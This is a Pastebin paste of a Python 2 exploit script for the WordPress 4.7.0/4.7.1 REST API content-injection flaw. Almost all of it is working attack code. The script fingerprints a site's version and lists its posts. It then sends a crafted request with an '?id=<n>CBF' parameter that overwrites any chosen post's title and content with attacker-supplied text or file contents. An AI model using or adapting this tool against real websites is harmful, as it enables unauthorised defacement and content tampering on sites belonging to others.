API tools faq
paste
Advertisement
choirurrizal

Wordpress content injection exploit by snoww0lf

choirurrizal
Mar 2nd, 2017
559
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.72 KB | None | 0 0
raw download clone embed print report
  1. #! /usr/bin/env python
  2.  
  3. """
  4. Technical Explanation: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
  5. REST API Wordpress reference: https://developer.wordpress.org/rest-api/reference/posts/#update-a-post
  6. Wordpress Version Affected: 4.7.0/4.7.1
  7. 2017 - Coded by snoww0lf.
  8. """
  9. import re
  10. import json
  11. import urllib2
  12.  
  13. class WpContent:
  14.     def __init__(self, url):
  15.         self.__url = url
  16.         self.__response = urllib2.urlopen(self.__url).read()
  17.  
  18.     def get_api_wp(self):
  19.         return re.findall(r"https://api.w.org/' href='(.*)'", self.__response)[0]
  20.  
  21.     def get_wp_version(self):
  22.         check_version = re.findall(r'ver=(.*)"', self.__response)[0]
  23.         if check_version == "4.7" or check_version == "4.7.1":
  24.             check_version += " ( Maybe vulnerable to inject ) "
  25.         else:
  26.             check_version += " ( Maybe not vulnerable to inject ) "
  27.         return check_version
  28.  
  29.     def get_wp_post_information(self):
  30.         get_post = urllib2.urlopen(self.get_api_wp()+"wp/v2/posts").read()
  31.         load_info = json.loads(get_post)
  32.         collected_information = ""
  33.         for load in load_info:
  34.             collected_information += "[x] Post ID: {0}\n[x] Post Title: {1}\n[x] Post URL: {2}\n[x] Post Content: {3} [SNIPPET]\n\n".\
  35.             format(load['id'], load['title']['rendered'].encode("utf-8"), load['link'], load['content']['rendered'][:100].encode('utf-8'))
  36.         return collected_information
  37.  
  38.     def inject_content(self, id_content, title, content):
  39.         data = json.dumps({
  40.             'title':title,
  41.             'content':content
  42.             })
  43.         params = {'Content-Type':'application/json'}
  44.         full_url = self.get_api_wp() + "wp/v2/posts/{0}/?id={0}CBF".format(id_content)
  45.         req = urllib2.Request(full_url, data, params)
  46.         resp = urllib2.urlopen(req).read()
  47.         return resp
  48.  
  49. def main():
  50.     print("[X] WORDPRESS 4.7.0/4.7.1 CONTENT INJECTION EXPLOIT BY snoww0lf [X]\n")
  51.     while True:
  52.         url = raw_input("[x] Enter the URL: ")
  53.         print("[?] Please wait ...\n")
  54.         wpcontent = WpContent(url)
  55.         wp_version = wpcontent.get_wp_version().split()[0]
  56.         print("[x] Wordpress Version: {0} ".format(wp_version))
  57.         if(wp_version == "4.7" or wp_version == "4.7.1"):
  58.             select = raw_input("[x] It's affected version. It seems vulnerable, continue? [y/n] ").lower()
  59.             while(select != "y" and select != "n"):
  60.                 print("[x] Wrong selection! Try again.")
  61.                 select = raw_input("[x] Affected version. Seems vulnerable, continue? [y/n] ").lower()
  62.             print("\n")
  63.             if(select == "y"):
  64.                 print("[x] Parsing data information, please wait ...\n")
  65.                 wp_information = wpcontent.get_wp_post_information()
  66.                 print(wp_information)
  67.                 inp_id = input("[x] Enter ID Content that you want to overwrite: ")
  68.                 inp_title = raw_input("[x] Change title: ")
  69.                 print("\n")
  70.                 print("=> 1. Load data from file.")
  71.                 print("=> 2. Input data.")
  72.                 print("\n")
  73.                 mode = input("[x] Change content by [1/2] ? ")
  74.                 if mode == 1:
  75.                     dfile = raw_input("[x] Enter the filename: ")
  76.                     with open(dfile, 'r') as f:
  77.                         readf = f.readlines()
  78.                     print("[x] Exploit in progress ...\n")
  79.                     wpcontent.inject_content(inp_id, inp_title, ''.join(readf))
  80.                 else:
  81.                     inp_data = raw_input("[?] Input data: ")
  82.                     print("[x] Exploit in progress ...\n")
  83.                     wpcontent.inject_content(inp_id, inp_title, inp_data)
  84.                 print("[x] Update success!\n")
  85.                 cont = raw_input("[?] Continue ? [y/n] ").lower()
  86.                 while(cont != "y" and cont != "n"):
  87.                     print("[x] Wrong selection! Try again.")
  88.                     cont = raw_input("[?] Continue ? [y/n] ").lower()
  89.                 if cont == "n": break
  90.             else:
  91.                 break
  92.         else:
  93.             cont = raw_input("[?] Continue ? ").lower()
  94.             while(cont != "y" and cont != "n"):
  95.                 print("[x] Wrong selection! Try again.")
  96.                 cont = raw_input("[?] Continue ? ").lower()
  97.             if cont == "n": break
  98.  
  99. if __name__ == '__main__':
  100. main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!